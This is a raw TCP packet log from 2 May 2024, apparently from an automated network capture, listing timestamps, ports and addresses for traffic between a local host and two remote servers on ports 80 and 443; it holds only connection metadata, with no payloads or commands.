May 2, 2024 04:54:54.081504107 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.081629038 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081723928 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081762075 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.081767082 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081864119 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.081901073 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.081979036 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.082123041 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.082165003 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.082220078 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.082334042 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.082370996 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.082395077 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.082535028 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.082580090 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.082880020 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083224058 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083266973 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.083374023 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083606005 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083652973 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.083667040 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083713055 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083755016 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.083777905 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083839893 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083885908 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.083920002 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083934069 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083965063 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.083966017 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084037066 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084076881 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084083080 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084240913 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084278107 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084407091 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084446907 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084487915 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084494114 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084558010 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084594965 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084609032 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084671974 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084713936 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084765911 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084794044 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084834099 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.084911108 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.084994078 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085028887 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.085074902 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085210085 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085249901 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.085284948 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085349083 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085386038 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.085519075 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085558891 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085599899 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.085618019 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085643053 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085681915 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.085737944 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085813046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.085850954 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.085875034 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086024046 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086062908 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.086074114 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086147070 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086194038 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.086216927 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086599112 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086643934 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.086652040 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086716890 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086759090 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.086886883 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086937904 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.086980104 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.086983919 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087065935 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087109089 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.087141991 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087219954 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087265015 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.087500095 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087512970 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087523937 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087554932 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.087635994 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087707996 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087719917 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087744951 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.087798119 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087836981 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.087892056 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087904930 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.087938070 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.087961912 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088033915 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088068962 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088074923 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088112116 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088155031 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088170052 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088238955 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088282108 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088284969 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088418961 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088466883 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088517904 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088577986 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088613987 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088649035 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088691950 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088726997 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088773012 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088823080 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088860989 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.088865042 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.088988066 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089029074 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.089052916 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089206934 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089243889 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.089497089 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089560986 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089605093 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.089613914 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089668989 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089718103 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.089742899 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089788914 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089831114 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.089839935 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.089966059 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090008974 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.090130091 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090174913 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090214968 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.090231895 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090420961 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090457916 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.090511084 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090713024 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090750933 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.090759039 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090946913 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.090990067 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.091023922 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091128111 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091166019 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.091201067 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091247082 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091284990 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.091389894 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091450930 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091485977 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091492891 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.091810942 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.091850996 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.091984034 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092315912 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092360973 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.092463017 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092554092 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092596054 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.092617989 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092715979 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092757940 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.092792988 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092871904 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.092915058 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.093275070 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093323946 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093360901 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.093411922 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093497038 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093537092 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.093552113 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093616962 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093652964 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.093724966 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093939066 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.093977928 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.094010115 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094062090 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094099045 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.094254971 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094275951 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094315052 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.094321966 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094439983 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094477892 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.094516993 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094768047 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.094809055 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.094862938 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095091105 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095132113 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.095155001 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095243931 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095288992 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.095298052 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095360041 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095406055 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.095619917 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095762014 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.095799923 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.096164942 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096314907 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096359015 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.096437931 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096478939 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096519947 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.096600056 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096672058 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096714020 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.096749067 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096793890 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096833944 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.096837044 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.096971989 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.097014904 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:54.097039938 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.097098112 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:54.097140074 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:55:24.882355928 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:56:03.282540083 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.282578945 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.282627106 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.283973932 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.284014940 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.284065008 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.580720901 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.580750942 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.580954075 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.580974102 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.712718010 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.712764978 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.712811947 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.790798903 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.790832043 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.820885897 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.822308064 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.828289986 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.828305006 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.828463078 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.828478098 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.830319881 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.830379009 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.832312107 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.832364082 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.944533110 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.944643974 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.944820881 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.944833994 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:03.945039034 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:03.945178986 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.019881010 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.035837889 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.035855055 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.036920071 CEST	443	49166	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.036986113 CEST	49166	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.075644970 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.075676918 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.075702906 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.075726032 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.075736046 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.075761080 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.075769901 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.075802088 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.075807095 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.082778931 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.082837105 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.082843065 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.090415001 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.090466022 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.090476990 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.097302914 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.097378969 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.097388983 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.117360115 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.117372990 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.156116009 CEST	443	49163	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.156172991 CEST	49163	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.181150913 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.181199074 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.181212902 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.184916973 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.184962034 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.184972048 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.191859961 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.191911936 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.191921949 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.199073076 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.199120998 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.199131966 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.206341028 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.206389904 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.206398964 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.208550930 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.213603973 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.220587969 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.220628977 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.220639944 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.227458000 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.227494955 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.227504969 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.227514982 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.227550983 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.234298944 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.241158962 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.241194010 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.241215944 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.241226912 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.241266012 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.247987032 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.254793882 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.254831076 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.254852057 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.254867077 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.254910946 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.261584044 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.268486023 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.268531084 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.268537045 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.286353111 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.286406040 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.286407948 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.286418915 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.286458015 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.289398909 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.295061111 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.295095921 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.295121908 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.295129061 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.295169115 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.300683022 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.305635929 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.305689096 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.305696011 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.310674906 CEST	443	49162	172.217.1.4	192.168.2.22
May 2, 2024 04:56:04.310719967 CEST	49162	443	192.168.2.22	172.217.1.4
May 2, 2024 04:56:04.310726881 CEST	443	49162	172.217.1.4	192.168.2.22
